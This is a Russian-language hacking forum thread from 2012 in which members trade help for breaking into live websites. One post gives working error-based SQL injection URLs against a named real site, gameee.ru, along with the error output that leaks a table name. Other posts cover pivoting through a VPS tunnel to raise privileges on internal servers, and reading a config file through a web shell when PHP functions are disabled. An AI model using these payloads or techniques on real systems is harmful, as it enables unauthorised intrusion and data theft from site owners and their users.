Старый 02.08.2012, 23:10   #2222
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Куда копать? Можно как-то "выбирать" эти ноды?
Untitled вне форума   Ответить с цитированием
Старый 03.08.2012, 00:07   #2224
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

> ставишь VPSProxy

> [+] Работа с гейтом происходит исключительно с помощью метода GET, что обеспечивает защиту от обнаружения по лог-файлам сервера.

может, POST?
12309 вне форума   Ответить с цитированием
Старый 03.08.2012, 00:50   #2225
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от FIXER Посмотреть сообщение
ставишь VPSProxy и ломишься через туннель к локалку подымая в каждом серваке права...
И в чем смысл ротирования серваков/нодов с одним и тем же контентом (синхронизируемым?)? Вообще не ясна система. Пощупал IP, соседние с внутренним - ничего.
Untitled вне форума   Ответить с цитированием
Старый 03.08.2012, 02:03   #2226
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

Untitled, за 1 действие выполнять 2 операции. Ноды отличаются как минимум хостнеймом. К примеру надо тебе работать именно с 1 нодой:
Код:
if( `hostname` !== 'node1' ) f5();
else h4x();
Это конечно долго, и пальцы качать о ф5 никто не любит, но если извне заставить отбратится к конкретной ноде нельзя (чаще всего именно так) - то увы.
__________________
Sad panda
nobody вне форума   Ответить с цитированием
Старый 03.08.2012, 04:38   #2227
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

nomad, очевидно, что если include работает в скриптах, то php может читать содержимое файла. Значит запрещены функции, которые шел использует для чтения файла, что phpinfo говорит на этот счёт?
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 03.08.2012, 07:35   #2228
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить
Код:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20version%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--+f
Всмысле не хочет выводить? Из вашего же вектора, если использовать подзапрос, то без проблем выводит:
Код:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20table_name%20FROM%20information_schema.tables%20where%20table_schema!=0x696E666F726D6174696F6E5F736368656D61%20limit%200,1%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--+f
Код:
Duplicate entry ':vtn:bot_history:ort:1' for key 'group_key'
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 03.08.2012, 08:19   #2229
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
От какого пользователя работаешь ты / кто владелец файла конфига / хоть один скрипт, инклудящий конфиг, ты можешь редактировать?
Я работаю под www/www, файлы созданы под site/site. Но есть пара скриптов, которые я могу редактировать.


Цитата:
Сообщение от M@ZAX@KEP Посмотреть сообщение
nomad, очевидно, что если include работает в скриптах, то php может читать содержимое файла. Значит запрещены функции, которые шел использует для чтения файла, что phpinfo говорит на этот счёт?
Disabled PHP Functions: popen,exec,system,passthru,proc_open,shell_exec,ap ache_get_modules,apache_get_version,apache_getenv, apache_note,apache_setenv,disk_free_space,diskfree space,dl,highlight_file,ini_alter,ini_restore,open log,phpinfo,proc_nice,shell_exec,show_source,symli nk
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 03.08.2012, 10:43   #2230
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Я работаю под www/www, файлы созданы под site/site. Но есть пара скриптов, которые я могу редактировать.




Disabled PHP Functions: popen,exec,system,passthru,proc_open,shell_exec,ap ache_get_modules,apache_get_version,apache_getenv, apache_note,apache_setenv,disk_free_space,diskfree space,dl,highlight_file,ini_alter,ini_restore,open log,phpinfo,proc_nice,shell_exec,show_source,symli nk
Вообще это бред какой-то, что инклудить можно, а прочитать нельзя. Ну пробуй get_defined_vars();
Код:
[root@tboolean tmp]# cat > config.php
<?php
$config = array("name"=>"value", "rdot"=>".org");
?>
[root@tboolean tmp]# php -r 'include "config.php"; print_r(get_defined_vars());'
[...]
            [config] => Array
                (
                    [name] => value
                    [rdot] => .org
                )
[...]
__________________
|
Boolean вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot